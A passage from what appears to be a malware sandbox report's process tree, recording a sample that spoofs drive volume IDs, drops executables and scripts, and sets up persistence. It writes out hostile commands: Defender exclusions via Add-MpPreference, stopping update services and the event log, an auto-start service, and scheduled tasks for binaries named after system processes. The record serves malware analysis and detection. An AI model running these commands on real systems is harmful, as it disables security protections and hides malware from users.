                                                                                                                                            • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                              C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: IRUR-ZC3E
                                                                                                                                              7⤵
                                                                                                                                                PID:1120
                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                              "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: 52P4-F485
                                                                                                                                              6⤵
                                                                                                                                                PID:1752
                                                                                                                                                • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                                  C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: 52P4-F485
                                                                                                                                                  7⤵
                                                                                                                                                    PID:1824
                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: 12RA-5J4H
                                                                                                                                                  6⤵
                                                                                                                                                    PID:1160
                                                                                                                                                    • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                                      C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: 12RA-5J4H
                                                                                                                                                      7⤵
                                                                                                                                                        PID:456
                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: ID96-1VK2
                                                                                                                                                      6⤵
                                                                                                                                                        PID:1980
                                                                                                                                                        • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                                          C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: ID96-1VK2
                                                                                                                                                          7⤵
                                                                                                                                                            PID:1668
                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: PJ56-9U6G
                                                                                                                                                          6⤵
                                                                                                                                                            PID:2456
                                                                                                                                                            • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                                              C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: PJ56-9U6G
                                                                                                                                                              7⤵
                                                                                                                                                                PID:2080
                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: 0N20-7S4D
                                                                                                                                                              6⤵
                                                                                                                                                                PID:2844
                                                                                                                                                                • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: 0N20-7S4D
                                                                                                                                                                  7⤵
                                                                                                                                                                    PID:2392
                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: C2E6-ITC6
                                                                                                                                                                  6⤵
                                                                                                                                                                    PID:2060
                                                                                                                                                                    • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: C2E6-ITC6
                                                                                                                                                                      7⤵
                                                                                                                                                                        PID:836
                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: 03TZ-EM5T
                                                                                                                                                                      6⤵
                                                                                                                                                                        PID:1172
                                                                                                                                                                        • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: 03TZ-EM5T
                                                                                                                                                                          7⤵
                                                                                                                                                                            PID:2432
                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: ZAC5-RA9I
                                                                                                                                                                          6⤵
                                                                                                                                                                            PID:1832
                                                                                                                                                                            • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: ZAC5-RA9I
                                                                                                                                                                              7⤵
                                                                                                                                                                                PID:328
                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: GGCK-E674
                                                                                                                                                                              6⤵
                                                                                                                                                                                PID:1216
                                                                                                                                                                                • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: GGCK-E674
                                                                                                                                                                                  7⤵
                                                                                                                                                                                    PID:1312
                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: 86LT-SUB9
                                                                                                                                                                                  6⤵
                                                                                                                                                                                    PID:2876
                                                                                                                                                                                    • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: 86LT-SUB9
                                                                                                                                                                                      7⤵
                                                                                                                                                                                        PID:2856
                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: AJR0-VS6E
                                                                                                                                                                                      6⤵
                                                                                                                                                                                        PID:1536
                                                                                                                                                                                        • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: AJR0-VS6E
                                                                                                                                                                                          7⤵
                                                                                                                                                                                            PID:2488
                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: 1K48-VAPI
                                                                                                                                                                                          6⤵
                                                                                                                                                                                            PID:3020
                                                                                                                                                                                            • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: 1K48-VAPI
                                                                                                                                                                                              7⤵
                                                                                                                                                                                                PID:1484
                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: SVLL-1HB6
                                                                                                                                                                                              6⤵
                                                                                                                                                                                                PID:2692
                                                                                                                                                                                                • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: SVLL-1HB6
                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                    PID:240
                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: SJAI-13VG
                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                    PID:1704
                                                                                                                                                                                                    • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: SJAI-13VG
                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                        PID:1560
                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: 1EAT-0GAS
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                        PID:524
                                                                                                                                                                                                        • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: 1EAT-0GAS
                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                            PID:592
                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: 4R2G-8IS6
                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                            PID:1952
                                                                                                                                                                                                            • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: 4R2G-8IS6
                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                PID:2216
                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: P3EN-E9JK
                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                PID:2836
                                                                                                                                                                                                                • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: P3EN-E9JK
                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                    PID:636
                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: 1NDD-39ZM
                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                    PID:1156
                                                                                                                                                                                                                    • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: 1NDD-39ZM
                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                        PID:2368
                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: 2M48-FGB6
                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                        PID:1164
                                                                                                                                                                                                                        • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: 2M48-FGB6
                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                            PID:2720
                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: 5C4H-1A0T
                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                            PID:2724
                                                                                                                                                                                                                            • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: 5C4H-1A0T
                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                PID:1916
                                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: EHNB-B7B4
                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                PID:1300
                                                                                                                                                                                                                                • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: EHNB-B7B4
                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                    PID:2164
                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.cfg
                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                    PID:2564
                                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.chm
                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                      PID:1904
                                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.exe
                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                        PID:2392
                                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amide.sys
                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                          PID:2844
                                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amifldrv64.sys
                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                            PID:1488
                                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                              PID:1800
                                                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\Disk.bat
                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                PID:1648
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe"
                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                              PID:2184
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                                                                "C:\Windows\System32\WScript.exe" "C:\ChainReview\4N7V2tIOe7KSQ8eET3YGuCyK2Y.vbe"
                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                  PID:2684
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                    cmd /c ""C:\ChainReview\8xoM57ln5l3nWVEqwKA0TDOQ0Am35EOuQMtKP.bat" "
                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                      PID:1848
                                                                                                                                                                                                                                                      • C:\ChainReview\sphyperRuntimedhcpSvc.exe
                                                                                                                                                                                                                                                        "C:\ChainReview/sphyperRuntimedhcpSvc.exe"
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                          PID:1704
                                                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Uninstall Information\explorer.exe'
                                                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                            PID:1484
                                                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\wininit.exe'
                                                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                            PID:608
                                                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ChainReview\lsass.exe'
                                                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                            PID:672
                                                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Favorites\taskhost.exe'
                                                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                            PID:2144
                                                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Media Player\it-IT\HpsrSpoof.exe'
                                                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                            PID:1944
                                                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\qQO7PpT31e.bat"
                                                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                                                              PID:2792
                                                                                                                                                                                                                                                              • C:\Windows\system32\chcp.com
                                                                                                                                                                                                                                                                chcp 65001
                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                  PID:576
                                                                                                                                                                                                                                                                • C:\Windows\system32\w32tm.exe
                                                                                                                                                                                                                                                                  w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                    PID:1312
                                                                                                                                                                                                                                                                  • C:\Program Files\Windows Media Player\it-IT\HpsrSpoof.exe
                                                                                                                                                                                                                                                                    "C:\Program Files\Windows Media Player\it-IT\HpsrSpoof.exe"
                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                      PID:2244
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\conhostsft.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\conhostsft.exe"
                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                            PID:2040
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\.conhostsft.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\.conhostsft.exe"
                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                PID:2892
                                                                                                                                                                                                                                                                • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                  PID:2904
                                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                    PID:1768
                                                                                                                                                                                                                                                                    • C:\Windows\system32\wusa.exe
                                                                                                                                                                                                                                                                      wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                        PID:2952
                                                                                                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                                                      C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                                                                                      PID:1688
                                                                                                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                                                      C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                                                                                      PID:2104
                                                                                                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                                                      C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                                                                                      PID:1740
                                                                                                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                                                      C:\Windows\system32\sc.exe stop bits
                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                                                                                      PID:1652
                                                                                                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                                                      C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                                                                                      PID:2652
                                                                                                                                                                                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                                                                                      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                        PID:900
                                                                                                                                                                                                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                                                                                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                          PID:812
                                                                                                                                                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                                                                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                            PID:2472
                                                                                                                                                                                                                                                                          • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                                                                                            C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                              PID:2916
                                                                                                                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                                                              C:\Windows\system32\sc.exe delete "driverupdate"
                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                                                                                                                              PID:2448
                                                                                                                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                                                              C:\Windows\system32\sc.exe create "driverupdate" binpath= "C:\ProgramData\VC_redist.x64.exe" start= "auto"
                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                                                                                                                              PID:2576
                                                                                                                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                                                              C:\Windows\system32\sc.exe stop eventlog
                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                                                                                                                              PID:1804
                                                                                                                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                                                              C:\Windows\system32\sc.exe start "driverupdate"
                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                                                                                                                              PID:1312
                                                                                                                                                                                                                                                                • C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                                  C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                    PID:1464
                                                                                                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                    schtasks.exe /create /tn "explorere" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Uninstall Information\explorer.exe'" /f
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                                                    PID:692
                                                                                                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                    schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files (x86)\Uninstall Information\explorer.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                                                    PID:1692
                                                                                                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                    schtasks.exe /create /tn "explorere" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Uninstall Information\explorer.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                                                    PID:812
                                                                                                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                    schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\wininit.exe'" /f
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                                                    PID:2408
                                                                                                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                    schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\wininit.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                                                    PID:2856
                                                                                                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                    schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 6 /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\wininit.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                                                    PID:1924
                                                                                                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                    schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 6 /tr "'C:\ChainReview\lsass.exe'" /f
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                                                    PID:3036
                                                                                                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                    schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\ChainReview\lsass.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                                                    PID:1748
                                                                                                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                    schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 5 /tr "'C:\ChainReview\lsass.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                                                    PID:3028
                                                                                                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                    schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\Favorites\taskhost.exe'" /f
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                                                    PID:1768
                                                                                                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                    schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\Users\All Users\Favorites\taskhost.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                                                    PID:2984
                                                                                                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                    schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\Favorites\taskhost.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                                                    PID:2936
                                                                                                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                    schtasks.exe /create /tn "HpsrSpoofH" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Media Player\it-IT\HpsrSpoof.exe'" /f
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                                                    PID:1708
                                                                                                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                    schtasks.exe /create /tn "HpsrSpoof" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\it-IT\HpsrSpoof.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                                                    PID:856
                                                                                                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
